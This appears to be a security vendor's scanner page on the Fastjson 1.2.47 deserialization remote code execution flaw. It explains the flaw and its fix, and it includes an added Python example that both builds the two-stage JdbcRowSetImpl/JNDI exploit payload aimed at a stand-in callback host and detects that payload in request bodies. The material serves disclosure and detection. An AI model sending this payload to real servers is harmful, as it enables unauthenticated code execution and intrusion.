Fastjson 1.2.47 Remote Code Execution Vulnerability Scanner
Detects 'Remote Code Execution (RCE)' vulnerability in Fastjson version 1.2.47
Short Info
Level: Critical
Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 4 weeks
Scan only one: Domain, IPv4
Toolbox: -
Fastjson is a high-performance JSON library for Java, widely used for parsing and generating JSON in web APIs, microservices and data interchange. It simplifies conversion between Java objects and JSON strings and is embedded in a large number of Java applications. Versions up to and including 1.2.47, however, contain a deserialization flaw that exposes the application to remote code execution, which is why keeping the library current matters.
The critical remote code execution vulnerability in Fastjson 1.2.47 stems from how the library deserializes untrusted input. Fastjson's autoType feature instantiates Java classes named in the JSON itself, and in 1.2.47 the deserializer for java.lang.Class caches any class it loads in the library's internal type map. A crafted payload can use that cache to make Fastjson instantiate a dangerous class even when autoType is disabled, bypassing the built-in deny list. The result is attacker-controlled object construction on the server and, through it, arbitrary code execution. The page rates this with a CVSS score of 10, reflecting the potential for complete compromise of affected systems.
The exploit is a JSON payload that uses the @type key to name Java classes. It works in two stages: the first object sets @type to java.lang.Class with a val of com.sun.rowset.JdbcRowSetImpl, which makes Fastjson load that class and cache it; the second object sets @type to com.sun.rowset.JdbcRowSetImpl with a dataSourceName pointing at an attacker-controlled RMI (or LDAP) server and sets autoCommit to true. Setting autoCommit makes JdbcRowSetImpl open a connection, which performs a JNDI lookup of dataSourceName against the attacker's server. On older JDKs (before 8u121 for RMI and 8u191 for LDAP) that lookup loads and runs a remote class supplied by the attacker; on newer JDKs the application still reaches out to the attacker's host, which is the out-of-band signal a scanner relies on to confirm the flaw. The exploitation process demonstrates the danger of deserializing untrusted data without strict restrictions on which classes may be instantiated.
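As an added example (not S4E's scanner code and not Fastjson's own code), the following Python builds the two-stage payload described above and runs a simple indicator check over a few constructed request bodies. The callback host oob.example.invalid, the port and token, and the sample bodies are assumptions made for the example; a real scanner would point dataSourceName at a listener it controls and confirm the finding by the out-of-band connection it receives.

```python
"""Added example, not S4E's scanner and not Fastjson's own code: builds the
two-stage Fastjson 1.2.47 probe described above and flags that pattern in
captured request bodies.

Assumptions (hypothetical): the callback host oob.example.invalid stands in
for a scanner-controlled RMI/LDAP listener; the sample bodies below are
constructed, not captured traffic.
"""
import json
import re

# Gadget class abused by the 1.2.47 technique (named on the page).
GADGET = "com.sun.rowset.JdbcRowSetImpl"

# JNDI URL schemes that JdbcRowSetImpl.connect() hands to InitialContext.lookup().
JNDI_SCHEME = re.compile(r"^(rmi|ldap|ldaps)://", re.IGNORECASE)


def build_probe(callback_host: str, port: int = 1099, token: str = "probe") -> str:
    """Return the JSON body a scanner would send.

    Key "a" makes Fastjson deserialise a java.lang.Class whose "val" names the
    gadget; in 1.2.47 the class it loads is cached in the type map, so key "b"
    resolves the gadget even when autoType is disabled. "autoCommit" forces
    JdbcRowSetImpl.connect(), which performs the JNDI lookup of dataSourceName.
    """
    payload = {
        "a": {"@type": "java.lang.Class", "val": GADGET},
        "b": {
            "@type": GADGET,
            "dataSourceName": f"rmi://{callback_host}:{port}/{token}",
            "autoCommit": True,
        },
    }
    return json.dumps(payload)


def _walk(node):
    """Yield every JSON object nested anywhere inside node (dicts and lists)."""
    if isinstance(node, dict):
        yield node
        for value in node.values():
            yield from _walk(value)
    elif isinstance(node, list):
        for value in node:
            yield from _walk(value)


def find_fastjson_indicators(body: str) -> list:
    """Return a list of reasons the body looks like the 1.2.47 exploit.

    An empty list means nothing matched. Bodies that are not valid JSON are
    ignored; json.loads also decodes escapes such as "\\u0040type", so merely
    escaping the "@" does not evade the check.
    """
    try:
        doc = json.loads(body)
    except ValueError:
        return []
    reasons = []
    for obj in _walk(doc):
        type_name = obj.get("@type")
        if not isinstance(type_name, str):
            continue
        if type_name == "java.lang.Class" and obj.get("val") == GADGET:
            reasons.append("java.lang.Class cache priming for " + GADGET)
        if type_name == GADGET:
            dsn = obj.get("dataSourceName", "")
            if isinstance(dsn, str) and JNDI_SCHEME.match(dsn):
                reasons.append(GADGET + " with JNDI dataSourceName " + dsn)
    return reasons


# Constructed sample request bodies (not real traffic).
SAMPLE_BODIES = [
    '{"name": "alice", "age": 30}',
    build_probe("oob.example.invalid"),
    '{"@type": "com.sun.rowset.JdbcRowSetImpl", '
    '"dataSourceName": "ldap://oob.example.invalid:389/x", "autoCommit": true}',
    '{"\\u0040type": "java.lang.Class", "val": "com.sun.rowset.JdbcRowSetImpl"}',
    'not json at all',
]


def flagged_bodies(bodies) -> list:
    """Indices of the bodies that carry at least one indicator."""
    return [i for i, body in enumerate(bodies) if find_fastjson_indicators(body)]


if __name__ == "__main__":
    print(build_probe("oob.example.invalid"))
    for i in flagged_bodies(SAMPLE_BODIES):
        print(i, find_fastjson_indicators(SAMPLE_BODIES[i]))
```

The detection side matches on parsed JSON structure rather than raw strings, so a `\u0040type` key is still caught. Fastjson itself accepts input that json.loads rejects (single-quoted strings, unquoted keys), so a production detector placed in front of a Fastjson application should mirror those parsing quirks or it will miss bodies the target still deserializes.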
Successful exploitation can lead to complete system compromise: data theft, tampering with the application or host, and use of the server as a foothold for further movement in the network. Because the code execution requires neither authentication nor user interaction, only the ability to send JSON to an endpoint that Fastjson parses, the vulnerability is a critical threat to the confidentiality, integrity and availability of affected systems. The fix is to upgrade to Fastjson 1.2.48 or later, which stops caching classes loaded through java.lang.Class; on current releases, enabling safeMode disables autoType entirely and removes this class of issue.
S4E provides an advanced cybersecurity platform to detect vulnerabilities like the RCE in Fastjson 1.2.47. Our comprehensive scanning tools offer in-depth vulnerability assessments, empowering users with actionable insights and detailed remediation guidelines. By joining our platform, you gain access to continuous monitoring and expert support, enhancing your security posture and protecting your digital assets from emerging threats. Ensure your systems are safeguarded against critical vulnerabilities with S4E.